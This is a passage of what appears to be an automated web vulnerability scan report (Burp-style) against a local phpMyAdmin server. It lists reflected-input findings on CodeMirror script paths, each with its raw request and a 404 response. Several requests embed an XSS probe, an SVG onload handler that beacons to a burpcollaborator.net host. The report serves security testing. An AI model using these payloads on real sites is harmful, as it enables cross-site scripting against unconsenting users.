The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addongs3zgtxvbr/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addongs3zgtxvbr/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.277. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 6 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/hintsn7hgjb4b2/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/hintsn7hgjb4b2/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.278. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/lint/lint.jsza1muxeery HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/lint/lint.jsza1muxeery was not found on this server.</p>
...[SNIP]...
19.279. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//pohsebbjbg4cgahnt0iyk7rzjqpldd8gw8mwjj97y%5c56burpcollaborator.net'%3e/js/vendor/codemirror/addon/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 438
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//pohsebbjbg4cgahnt0iyk7rzjqpldd8gw8mwjj97y\56burpcollaborator.net'&gt;/js/vendor/codemirror/addon/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.280. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//rytuodlllieeqcrp32s0u911tsznnfii6awytlk99%5c56burpcollaborator.net'%3e/vendor/codemirror/addon/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 446
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//rytuodlllieeqcrp32s0u911tsznnfii6awytlk99\56burpcollaborator.net'&gt;/vendor/codemirror/addon/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.281. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendorrc4az2pj3d/codemirror/addon/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendorrc4az2pj3d/codemirror/addon/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.282. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirroryu2htmesxw/addon/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirroryu2htmesxw/addon/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.283. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addono46hwqaqh9/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addono46hwqaqh9/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.284. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 6 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/lintiyzweu9xp4/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/lintiyzweu9xp4/lint.js was not found on this server.</p>
...[SNIP]...
19.285. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.jsq7sfu53pb1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.jsq7sfu53pb1 was not found on this server.</p>
...[SNIP]...
19.286. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//0643wmtutrmnylzybb092i9a117wvorff75v2is6h%5c56burpcollaborator.net'%3e/js/vendor/codemirror/addon/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 444
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//0643wmtutrmnylzybb092i9a117wvorff75v2is6h\56burpcollaborator.net'&gt;/js/vendor/codemirror/addon/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.287. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//u61xwgtotlmhyfzsb5032c941v7qvir9f15p2ct0i%5c56burpcollaborator.net'%3e/vendor/codemirror/addon/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 452
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//u61xwgtotlmhyfzsb5032c941v7qvir9f15p2ct0i\56burpcollaborator.net'&gt;/vendor/codemirror/addon/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.288. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor5o1pucibya/codemirror/addon/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:17 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor5o1pucibya/codemirror/addon/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.289. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirrorrpx524ahbx/addon/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirrorrpx524ahbx/addon/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.290. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 5]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon3pnxu6mo5d/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon3pnxu6mo5d/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.291. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 6]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 6 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/runmode04dgrptw3r/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:40 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/runmode04dgrptw3r/runmode.js was not found on this server.</p>
...[SNIP]...
19.292. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/lib/codemirror.jst9t1vip8uw HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 342
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/lib/codemirror.jst9t1vip8uw was not found on this server.</p>
...[SNIP]...
19.293. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//iqclg4dcd965i3jgvtkrm0tsljref6b1ztphm4cs1%5c56burpcollaborator.net'%3e/js/vendor/codemirror/lib/codemirror.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:28 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 437
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//iqclg4dcd965i3jgvtkrm0tsljref6b1ztphm4cs1\56burpcollaborator.net'&gt;/js/vendor/codemirror/lib/codemirror.js was not found on this server.</p>
...[SNIP]...
19.294. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//zx02nlktkqdmpkqx2ar8th09s0yvmnii6awytlk99%5c56burpcollaborator.net'%3e/vendor/codemirror/lib/codemirror.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:28 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 445
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//zx02nlktkqdmpkqx2ar8th09s0yvmnii6awytlk99\56burpcollaborator.net'&gt;/vendor/codemirror/lib/codemirror.js was not found on this server.</p>
...[SNIP]...
19.295. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor36fdlw0jbk/codemirror/lib/codemirror.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 342
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor36fdlw0jbk/codemirror/lib/codemirror.js was not found on this server.</p>
...[SNIP]...
19.296. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/lib/codemirror.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirrorehnv12s7o2/lib/codemirror.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 342
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirrorehnv12s7o2/lib/codemirror.js was not found on this server.</p>
...[SNIP]...
19.297. http://localhost/phpmyadmin/js/vendor/codemirror/lib/codemirror.js [URL path folder 5]

Summary

Severity:   Information